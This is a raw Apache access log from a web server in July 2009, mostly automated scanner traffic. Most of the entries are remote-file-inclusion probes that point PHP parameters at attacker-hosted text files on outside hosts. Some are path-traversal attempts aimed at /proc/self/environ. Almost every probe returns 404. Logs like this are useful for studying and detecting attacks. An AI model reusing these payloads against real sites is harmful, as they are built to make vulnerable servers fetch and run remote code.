74.53.70.114 - - [12/Jul/2009:01:28:35 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.53.70.114 - - [12/Jul/2009:01:28:35 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.53.70.114 - - [12/Jul/2009:01:28:35 -0400] "GET /logs/access_log.Q109051800//skin/ggambo7002_board/write.php?dir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:37 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:37 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:37 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:37 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.53.70.114 - - [12/Jul/2009:01:28:47 -0400] "GET /logs/access_log.Q109051300//skin/ggambo7002_board/write.php?dir=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:53 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:53 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:53 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:53 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:57 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:57 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:57 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:28:57 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:29:55 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:29:55 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:29:55 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.28.140 - - [12/Jul/2009:01:29:55 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.78.244 - - [12/Jul/2009:01:29:55 -0400] "GET /logs/access_log.Q109060300 HTTP/1.0" 200 3991095 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [12/Jul/2009:01:30:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.70 - - [12/Jul/2009:01:35:05 -0400] "GET /images/items/45492000_full.jpg HTTP/1.1" 200 11856 "-" "Googlebot-Image/1.0"
209.59.12.99 - - [12/Jul/2009:01:35:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [12/Jul/2009:01:40:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
147.123.157.1 - - [12/Jul/2009:01:40:48 -0400] "GET /logs/access_log.Q109051900%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:01:40:48 -0400] "GET /logs/access_log.Q109061200%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:01:40:48 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:01:40:48 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:01:41:53 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:01:41:55 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:01:41:55 -0400] "GET /logs/access_log.Q109060100%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
83.143.81.26 - - [12/Jul/2009:01:42:24 -0400] "GET /logs/index.php?pagina=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
83.143.81.26 - - [12/Jul/2009:01:42:24 -0400] "GET /index.php?pagina=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
61.250.92.173 - - [12/Jul/2009:01:42:38 -0400] "GET /logs/access_log.Q109061700//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
61.250.92.173 - - [12/Jul/2009:01:42:38 -0400] "GET //include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
61.250.92.173 - - [12/Jul/2009:01:42:38 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
61.250.92.173 - - [12/Jul/2009:01:42:40 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
66.11.230.36 - - [12/Jul/2009:01:42:48 -0400] "GET /logs/access_log.Q109052900%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:01:43:28 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:01:43:28 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:01:43:28 -0400] "GET /logs/access_log.Q109060100%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:01:44:03 -0400] "GET /logs/access_log.Q109052900%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
210.205.57.2 - - [12/Jul/2009:01:44:21 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
210.205.57.2 - - [12/Jul/2009:01:44:21 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.205.57.2 - - [12/Jul/2009:01:44:21 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
210.205.57.2 - - [12/Jul/2009:01:44:41 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:01:44:55 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:01:44:55 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:01:44:55 -0400] "GET /logs/access_log.Q109052800//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:01:45:22 -0400] "GET /logs/error_log.Q109052800//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:01:45:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.250.92.173 - - [12/Jul/2009:01:45:54 -0400] "GET /logs/access_log.Q109061700%20//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
200.101.70.1 - - [12/Jul/2009:01:46:30 -0400] "GET /logs/access_log.Q109051100//include/admin.lib.inc.php?site_path=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
200.101.70.1 - - [12/Jul/2009:01:46:31 -0400] "GET //include/admin.lib.inc.php?site_path=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
200.101.70.1 - - [12/Jul/2009:01:46:31 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
220.231.126.252 - - [12/Jul/2009:01:46:52 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:01:46:52 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:01:46:52 -0400] "GET /logs/access_log.Q109052800//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:01:47:17 -0400] "GET /logs/error_log.Q109052800//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:01:47:41 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:01:47:41 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:01:47:41 -0400] "GET /logs/access_log.Q109060100%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:01:47:59 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:01:47:59 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:01:47:59 -0400] "GET /logs/access_log.Q109052800//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:01:48:04 -0400] "GET /logs/access_log.Q109052800//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:01:48:04 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:01:48:04 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:01:48:12 -0400] "GET /logs/error_log.Q109052800//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:01:48:16 -0400] "GET /logs/error_log.Q109052800//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:01:48:47 -0400] "GET /logs/error_log.Q109061200%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:01:49:00 -0400] "GET /logs/access_log.Q109060100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:01:49:10 -0400] "GET /logs/access_log.Q109052900//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:01:50:00 -0400] "GET /logs/access_log.Q109052800//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:01:50:00 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:01:50:00 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:01:50:13 -0400] "GET /logs/error_log.Q109052800//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:01:50:27 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:01:50:27 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:01:50:27 -0400] "GET /logs/access_log.Q109052800//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:01:50:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.143.81.26 - - [12/Jul/2009:01:50:52 -0400] "GET /index.php?pagina=http://frikirken.no/ok.txt??? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
83.143.81.26 - - [12/Jul/2009:01:50:52 -0400] "GET /logs/index.php?pagina=http://frikirken.no/ok.txt??? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
222.236.47.192 - - [12/Jul/2009:01:51:08 -0400] "GET /logs/error_log.Q109052800//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
66.249.68.247 - - [12/Jul/2009:01:51:37 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1193A84E96B340002DD1058+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.205.57.2 - - [12/Jul/2009:01:51:37 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.205.57.2 - - [12/Jul/2009:01:51:37 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
210.205.57.2 - - [12/Jul/2009:01:51:37 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
210.205.57.2 - - [12/Jul/2009:01:51:37 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.petechnologies.net///id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:01:52:10 -0400] "GET /logs/access_log.Q109060100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:01:52:14 -0400] "GET /logs/access_log.Q109052900//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
87.230.35.175 - - [12/Jul/2009:01:53:23 -0400] "GET //addons/guildbank/searcharrays.php?addonDir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.230.35.175 - - [12/Jul/2009:01:53:23 -0400] "GET /logs/access_log.Q109070200//addons/guildbank/searcharrays.php?addonDir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
87.230.35.175 - - [12/Jul/2009:01:53:25 -0400] "GET /logs//addons/guildbank/searcharrays.php?addonDir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:01:53:32 -0400] "GET /logs/access_log.Q109052800%20%20//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:01:53:37 -0400] "GET /logs/access_log.Q109052800%20%20//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:01:53:42 -0400] "GET /logs/error_log.Q109052800%20%20//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:01:53:45 -0400] "GET /logs/access_log.Q109052800%20%20//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jul/2009:01:53:50 -0400] "GET /lostpasswd.php?env[include_prefix]=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
121.124.127.34 - - [12/Jul/2009:01:53:50 -0400] "GET /logs/error_log.Q109052800%20%20//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:01:53:55 -0400] "GET /logs/access_log.Q109060100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:01:54:04 -0400] "GET /logs/access_log.Q109061200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:01:54:08 -0400] "GET /logs/error_log.Q109052800%20%20//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:01:54:14 -0400] "GET /logs/access_log.Q109052800%20%20//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
38.99.44.103 - - [12/Jul/2009:01:53:10 -0400] "GET /logs/error_log.Q109060700 HTTP/1.0" 200 2560143 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
77.221.130.22 - - [12/Jul/2009:01:54:22 -0400] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
77.221.130.22 - - [12/Jul/2009:01:54:22 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_jreactions/langset.php?comPath=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
77.221.130.22 - - [12/Jul/2009:01:54:22 -0400] "GET /administrator/components/com_jreactions/langset.php?comPath=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.22 - - [12/Jul/2009:01:54:45 -0400] "GET /logs/access_log.Q109051700/administrator/components/com_jreactions/langset.php?comPath=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
218.249.36.194 - - [12/Jul/2009:01:55:03 -0400] "GET /lostpasswd.php?env[include_prefix]=http://band.lizetteand.com/media/fid.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
220.231.126.252 - - [12/Jul/2009:01:55:09 -0400] "GET /logs/error_log.Q109052800%20%20//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:01:55:29 -0400] "GET /logs/access_log.Q109070200//addons/guildbank/searcharrays.php?addonDir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:01:55:29 -0400] "GET //addons/guildbank/searcharrays.php?addonDir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:01:55:29 -0400] "GET /logs//addons/guildbank/searcharrays.php?addonDir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:01:55:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
204.62.55.12 - - [12/Jul/2009:01:56:19 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01 HTTP/1.1" 200 49495 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
74.63.91.170 - - [12/Jul/2009:02:00:32 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:02:00:32 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:02:00:32 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:02:00:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.63.91.170 - - [12/Jul/2009:02:00:49 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.78.244 - - [12/Jul/2009:02:04:09 -0400] "GET /logs/access_log.Q108030500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.63.91.170 - - [12/Jul/2009:02:04:14 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:02:04:25 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:02:05:12 -0400] "GET /logs/access_log.Q109060100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
